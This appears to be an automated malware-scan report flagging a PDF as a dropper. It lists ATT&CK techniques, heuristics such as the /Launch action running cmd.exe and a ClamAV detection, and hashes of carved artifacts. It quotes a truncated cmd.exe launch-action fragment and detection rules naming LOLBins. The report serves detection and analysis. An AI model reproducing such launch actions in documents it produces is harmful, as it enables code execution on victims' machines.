Verdict: MALICIOUS
Risk Score: 244

Malware Insights

MITRE ATT&CK:
- T1059.003 Windows Command Shell
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
This PDF file contains embedded JavaScript and a launch action that executes cmd.exe. The command line indicates an attempt to download and execute a second-stage payload, likely a dropper, as suggested by the ClamAV detection 'Pdf.Dropper.Agent-7540147-0'. The specific command executed is 'cmd.exe /Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\hping2_v1.5.pdf" (cd "Desktop"', which is designed to prepare the environment for further execution.
Heuristics (7)

- Launch action (critical, PDF_LAUNCH): PDF contains a /Launch action whose target is an executable, URL, or UNC path — can start an external application
- /Launch action target: cmd.exe (critical, PDF_LAUNCH_COMMAND): PDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\hping2_v1.5.pdf" (cd "Desktop"' — references a known-dangerous executable (cmd, PowerShell, etc.).
- ClamAV: Pdf.Dropper.Agent-7540147-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Pdf.Dropper.Agent-7540147-0
- Visible LOLBin command execution instruction (high, SE_LOLBIN_RUN_COMMAND): Document contains instructions or visible command text involving Windows script/execution tools such as PowerShell, mshta, cmd, rundll32, or regsvr32
- JavaScript action (low, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded file (low, PDF_EMBEDDED): PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
Extracted artifacts (32)
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| javascript_obj0188_000.js | 88cfd521c32031f07d83cbda8948fa33ba224a83770188d884b7690e60397d20 | pdf-javascript-stream | PDF /JS object 188 at offset 0x67673 | 60 bytes |
| stream_007_off00001c85.bin | 04aaa3ae9b9fadd14a44a7903d3ca5d7ac8c848f9c97d0517916e5baa8ee0130 | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x1C85 | 1174 bytes |
| font_00_cff_off0002ac6a.bin | 228e90e4993260e10a6a6faebb9e48e4745bd1d7206641a87eab37e6e53698c1 | pdf-font-stream | PDF embedded font (cff) at offset 0x2AC6A | 9397 bytes |
| font_01_cff_off0002d2fd.bin | c7569064a2c94465bbc4dde95bc29eb6617ad11b466fb74cb66e5f97ee2a32d0 | pdf-font-stream | PDF embedded font (cff) at offset 0x2D2FD | 5236 bytes |
| font_02_cff_off0002e9aa.bin | 5c3d9a8d7a76bff1023c23ca6c9a48ac6806fdafaa31424fead817a9ce7616cd | pdf-font-stream | PDF embedded font (cff) at offset 0x2E9AA | 8179 bytes |
| font_03_cff_off00030be8.bin | 209b09e46099f51af7458833c634329efd054fb011bb6f46c49886e2ccd59511 | pdf-font-stream | PDF embedded font (cff) at offset 0x30BE8 | 6632 bytes |
| font_04_cff_off0003279f.bin | ff9de15caaafd11156644b26839ddc49cc0caeb4c3a6a38dde6b8ed813096755 | pdf-font-stream | PDF embedded font (cff) at offset 0x3279F | 4311 bytes |
| font_05_cff_off00033a9e.bin | be106328688e2d9054c5532bf270a07bf22da24cd95fb4cad45363ecfd3e1f6c | pdf-font-stream | PDF embedded font (cff) at offset 0x33A9E | 7034 bytes |
| font_06_cff_off000358a3.bin | 99678a6932ac6faec4cb0aef5786ac7b1d7418c810e43e1844e2768026ddc580 | pdf-font-stream | PDF embedded font (cff) at offset 0x358A3 | 8252 bytes |
| font_07_cff_off00037ad7.bin | b7e2075334b90be50f82c89f0beaad3fff72e72b5a51b22e276369636e2443ae | pdf-font-stream | PDF embedded font (cff) at offset 0x37AD7 | 4985 bytes |
| font_08_cff_off0003907f.bin | 9f9a6a7fa3540c13fd3dcd83729fbe035c24507cbd41793caa76259583c0a771 | pdf-font-stream | PDF embedded font (cff) at offset 0x3907F | 5760 bytes |
| font_09_cff_off0003a922.bin | e5acddf1554932c2b19e09b710e2ad0fac657d7df0f1f72b0ac940b5e892c880 | pdf-font-stream | PDF embedded font (cff) at offset 0x3A922 | 7370 bytes |
| font_10_cff_off0003c84a.bin | 2fc82925be2994297817c249729ad748eea0406e2489a141ce9944fd7f70f783 | pdf-font-stream | PDF embedded font (cff) at offset 0x3C84A | 9302 bytes |
| font_11_cff_off0003eeb1.bin | 3229fd3dfb05a35f75df8e0c84b008740682fc7ab868bbe5e9b79b29b97210d7 | pdf-font-stream | PDF embedded font (cff) at offset 0x3EEB1 | 5329 bytes |
| font_12_cff_off000405d7.bin | 7fc456334bd44cf1ec7d1f97d6ad2ceee0db730c21b57e29bae155d4f1be62c2 | pdf-font-stream | PDF embedded font (cff) at offset 0x405D7 | 7092 bytes |
| font_13_cff_off0004239e.bin | 18ae16f8003cd2feb2b9f88cea379aa51aac54954ab06888b09aa7180106feb9 | pdf-font-stream | PDF embedded font (cff) at offset 0x4239E | 6690 bytes |
| font_14_cff_off00043f96.bin | b072f46064d1f62bd29f45ddce1b1451f06e7fe4d41bf485fc8accb21b38176d | pdf-font-stream | PDF embedded font (cff) at offset 0x43F96 | 4945 bytes |
| font_15_cff_off000454d4.bin | fc6d0cb83a4c8872293e7a68ef6de413a8f0a7379c828733ddce4f13f5450a16 | pdf-font-stream | PDF embedded font (cff) at offset 0x454D4 | 5283 bytes |
| font_16_cff_off00046b86.bin | 823f05a9bcc77c17c56140e6bd5deda9d3c7f5ee906eb125d0e26cc82b920c0f | pdf-font-stream | PDF embedded font (cff) at offset 0x46B86 | 5618 bytes |
| font_17_cff_off0004835b.bin | 939079e38b428f4920cccba851f012642986552bfcba18f728e75e5c52da05f0 | pdf-font-stream | PDF embedded font (cff) at offset 0x4835B | 4735 bytes |
| font_18_cff_off0004982c.bin | eb3097e7ea77c8cc142d2c2180e753788a7e73cebc2553fbabdbbb06306c771b | pdf-font-stream | PDF embedded font (cff) at offset 0x4982C | 9210 bytes |
| font_19_cff_off0004be52.bin | cbb40c01088c3f15437344d855bc5120e501226ebf230ceb03b96c9145b671ab | pdf-font-stream | PDF embedded font (cff) at offset 0x4BE52 | 6426 bytes |
| font_20_cff_off0004d92e.bin | f8674673f03f78780f1e4146d156107c85f967474a01e2b8b58e27fc72750679 | pdf-font-stream | PDF embedded font (cff) at offset 0x4D92E | 3363 bytes |
| font_21_cff_off0004e8a1.bin | c1c90a6cb422e93face4f4f7938152665529290923f3904df119bfa8a6a6586b | pdf-font-stream | PDF embedded font (cff) at offset 0x4E8A1 | 9170 bytes |
| font_22_cff_off00050e90.bin | a950d9e8cececc97635d7b91d82e5f72ea6cfb1b30654ee7d404ba940de1e591 | pdf-font-stream | PDF embedded font (cff) at offset 0x50E90 | 6726 bytes |
| font_23_cff_off00052b0d.bin | 27bc49ded50a5821595f43d070c8c22c230f3ff133033ce5dbb95b130fe75e3d | pdf-font-stream | PDF embedded font (cff) at offset 0x52B0D | 7860 bytes |
| font_24_cff_off00054c06.bin | f481ee6799ed43ac3f6cf9706ddebe6468f83bd05fd581793cf98c99bc203f17 | pdf-font-stream | PDF embedded font (cff) at offset 0x54C06 | 6218 bytes |
| font_25_cff_off0005668d.bin | 32b2d153d9f0256bb79f5fff41773beeb9f815ff490421459f8a5836214deae5 | pdf-font-stream | PDF embedded font (cff) at offset 0x5668D | 8056 bytes |
| font_26_cff_off00058773.bin | a9d4fe489a2614ecccfbf96489e1627920902ddb77026e26d9a4311c22640759 | pdf-font-stream | PDF embedded font (cff) at offset 0x58773 | 762 bytes |
| font_27_cff_off00058ca8.bin | 890b91886042b3568a0a822ff33f43036ee3e7f9e7ec709072ad6602bac8b257 | pdf-font-stream | PDF embedded font (cff) at offset 0x58CA8 | 7944 bytes |
| font_28_cff_off0005adba.bin | f2213c066cb6f74e874b4a3ec694719eff859b77da0075a1b4edeb4d3faaded6 | pdf-font-stream | PDF embedded font (cff) at offset 0x5ADBA | 6511 bytes |
| font_29_cff_off0005c90b.bin | 5d90f4b54e64eada4c630068b02728517698d6f2bbb25699852f641a5fad4674 | pdf-font-stream | PDF embedded font (cff) at offset 0x5C90B | 6394 bytes |